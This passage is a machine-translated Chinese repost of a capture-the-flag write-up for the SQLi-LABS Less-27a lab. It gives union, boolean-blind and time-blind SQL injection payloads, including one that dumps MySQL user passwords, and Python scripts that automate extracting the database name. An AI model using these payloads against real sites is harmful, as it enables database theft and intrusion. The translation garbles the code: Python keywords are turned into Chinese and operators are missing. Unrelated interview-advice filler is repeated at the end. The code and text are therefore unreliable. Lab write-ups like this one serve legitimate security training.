SELECT%a0group_concat(列名)
来自%a0information_schema.columns%a0
其中%a0table_schema=\’安全\’%a0and%a0table_name=\’用户\’
获取数据库管理员用户密码
SELECT%a0group_concat(用户名,密码)
来自%a0mysql.user%a0where%a0user=‘Mitsuan’
### 方法2:布尔盲注
有关使用布尔盲注的详细说明,请参阅我的其他文章。
【布尔盲注如何使用详解,原理+步骤+实用教程】( )
**第一步,确定注入点**
如果在地址栏中输入?id=1\’and\’1,页面将正常显示。
如果在地址栏输入“?id=1\’and\’0”,页面异常(空)。
**第2步,确定长度**
以您当前的数据库为例,假设数据库名称长度大于1,则在地址栏中输入以下内容:
?id=1\’ 和%a0
长度(
(数据库())
)1
%a0和\’1
库名称必须大于1,以确保页面正确显示并且负载可用。
测试长度从1开始依次增加,其余由脚本决定。
**第3步,枚举字符**
截取库名的第一个字符,将其转换为ASCLL代码,并判断其是否大于1。在地址栏中输入:
?id=1\’ 和%a0
ASCII (
子字符串(
(数据库())
,1,1)
)1
%a0和\’1
字符的ASCLL 代码必须大于1,以确保页面显示正确且负载可用。
接下来判断字符的ASCLL码是否等于(32~126)。
确定第一个字符的内容后,按照此方法确定其余字符。为了提高效率,我们将使用稍后将枚举的脚本。
**移动**
Python 中的自动推理脚本如下,可以根据您的需要进行修改。
导入请求
将url 替换成你的靶场关卡网址
修改两个对应的payload
目标网址(不带参数)
URL=“http://8ad7ef14ce564257803e9f3eabade873.app.mituan.zone/Less-27a/”
猜解长度使用的payload
Payload_len=\”\”\”?id=1\’和%a0
长度(
(数据库())
)={n}
%a0和\’1\’\’\’\’
枚举字符使用的payload
Payload_str=\”\”\”?id=1\’和%a0
ASCII (
子字符串(
(数据库())
,{l},1)
)={n}
%a0和\’1\’\’\’\’
获取长度
def getLength(url, 有效负载):
length=1 # 初始测试长度为1
而True:
Response=request.get(url=url+payload_len.format(n=长度))
# 如果页面上存在该内容则表示成功。
如果“您的登录名”响应。文本:
print(\’长度测试完成。长度为:\’, length,)
返回长度;
: 其他
print(\’测试长度:\’, length)
length +=1 # 增加测试长度
获取字符
def getStr(url, 负载, 长度):
str=\’\’ # 初始表名/库名为空
# 在循环的第一级截取每个字符
: 表示范围(1, 长度+ 1) 内的l
# 循环的第二级枚举了截取该字符的所有可能性。
对于(33, 126): 范围内的n
响应=request.get(url=url+payload_str.format(l=l, n=n))
# print(\’猜猜\’, n)
# 如果页面上存在该内容则表示成功。
如果“您的登录名”响应。文本:
字符串+=字符(n)
print(\’th\’, l, \’成功猜出字符:\’, str)
休息;
返回一个字符串。
开始猜解
长度=getLength(url, Payload_len)
getStr(url,payload_str,长度)
执行结果如下。
对于其他数据库删除操作,只需将下面圆圈中的位置替换为您的SQL语句即可。
常用的库删除语句见方法一末尾。
### 方法3:时盲注入
**第一步,确定注入点**
如果在地址栏中输入?id=1\’and\’1,页面将正常显示。
如果在地址栏输入“?id=1\’and\’0”,页面异常(空)。
**第2步,确定长度**
以您当前的数据库为例,检查数据库名称的长度是否大于1。如果大于1,请在地址栏中键入以下内容:
?id=1\’ 和%a0
如果(
(长度(
(数据库())
)1)
, 睡眠(5), 3)
%a0和\’1
库名长度必须大于1,页面延迟为5秒以确保有效负载可用。
从1 开始,依次增加测试长度,然后使用脚本进行确定。
**第3步,枚举字符**
截取库名称的第一个字符,将其转换为ASCLL 代码,并检查它是否大于1。如果大于1,请在地址栏中键入以下内容:
?id=1\’ 和%0a
如果(
(ASCII(
子字符串(
(数据库())
,1,1)
)1)
, 睡眠(5), 3)
%a0和\’1
该字符的ASCLL 代码必须大于1,因此页面将延迟5 秒以确保有效负载可用。
接下来判断字符的ASCLL码是否等于(32~126)。
确定第一个字符的内容后,按照此方法确定其他字符,稍后使用脚本枚举。
**移动**
Python 自动化脚本如下,可以根据需要进行修改。
导入请求
导入时间
将url 替换成你的靶场关卡网址
修改两个对应的payload
目标网址(不带参数)
URL=“http://8ad7ef14ce564257803e9f3eabade873.app.mituan.zone/Less-27a/”
猜解长度使用的payload
Payload_len=\”\”\”?id=1\’和%a0
如果(
(长度(
(数据库())
)={n})
, 睡眠(5), 3)
%a0和\’1\’\’\’\’
枚举字符使用的payload
Payload_str=\”\”\”?id=1\’和%0a
如果(
(ASCII(
子字符串(
(数据库())
,{n},1)
)={r})
, 睡眠(5), 3)
%a0和\’1\’\’\’\’
获取长度
def getLength(url, 有效负载):
length=1 # 初始测试长度为1
而True:
开始时间=时间.time()
Response=request.get(url=url+payload_len.format(n=长度))
# 页面响应时间=执行结束时间-执行开始时间
use_time=time.time() – 开始时间
# 响应时间为5秒表示猜测成功。
使用时间5:
print(\’长度测试完成。长度为:\’, length,)
返回长度;
: 其他
print(\’测试长度:\’, length)
length +=1 # 增加测试长度
获取字符
def getStr(url, 负载, 长度):
str=\’\’ # 初始表名/库名为空
# 在循环的第一级截取每个字符
: 表示范围(1, 长度+ 1) 内的l
# 循环的第二级枚举了截取该字符的所有可能性。
对于(33, 126): 范围内的n
开始时间=时间.time()
响应=request.get(url=url+payload_str.format(n=l, r=n))
# 页面响应时间=执行结束时间-执行开始时间
use_time=time.time() – 开始时间
# 如果页面上存在该内容则表示成功。
使用时间5:
字符串+=字符(n)
print(\’th\’, l, \’成功猜出字符:\’, str)
休息;
返回一个字符串。
开始猜解
长度=getLength(url, Payload_len)
getStr(url,payload_str,长度)
执行结果如下。
终于
51zkw的编辑总结道,成功只属于那些做好准备的人。参加任何类型的面试时,你需要做的就是做好充分的准备,注意面试礼仪和着装,向面试官展示你的热情和诚意。即使最终没有通过考试,你也应该总结一下自己的经验,为下次面试做好充分的准备。
**在这里,我们准备了一些专门的采访材料,是我们采访后整理的。除了面试题,我们还整理了互联网公司Android程序员面试的大部分面试题及答案。希望我们的文档和系统的进阶学习视频资料分享给大家,帮助您面试前复习,找到好工作,节省网上查找资料的时间。 **
毕竟,无论遇到什么样的面试官,去面试最重要的还是自己的优势,如果你有足够的能力和技巧,就不会害怕失败。面试后offer!
别人之所以总是比你优秀,是因为他们已经非常优秀了,而且他们一直在努力变得更好。你是否还对现状感到满意,心里暗暗高兴呢?今后我们将不断更新技术信息,如果您在阅读本文后能够“点赞”或“关注”我们,我们将不胜感激。
节省网上搜索信息学习的时间。 **
毕竟,无论遇到什么样的面试官,去面试最重要的还是自己的优势,如果你有足够的能力和技巧,就不会害怕失败。面试后offer!
[外部链接图像正在传输.(img-TYJOuK40-1720043384444)]
[外部链接图像正在传输.(img-Ohxve7al-1720043384444)]
别人之所以总是比你优秀,是因为他们已经非常优秀了,而且他们一直在努力变得更好。你是否还对现状感到满意,心里暗暗高兴呢?我们将不断更新技术信息,如果您在阅读本文后能够“喜欢”或“关注”我们,我们将不胜感激。
[外部链接图像正在传输.(img-UWQdwiu1-1720043384445)]
#SQLi LABS Less 27a 联合注入+布尔盲注入+时间盲注入_sqlilabs Level 27a 相关内容以上源网络信息仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92839.html
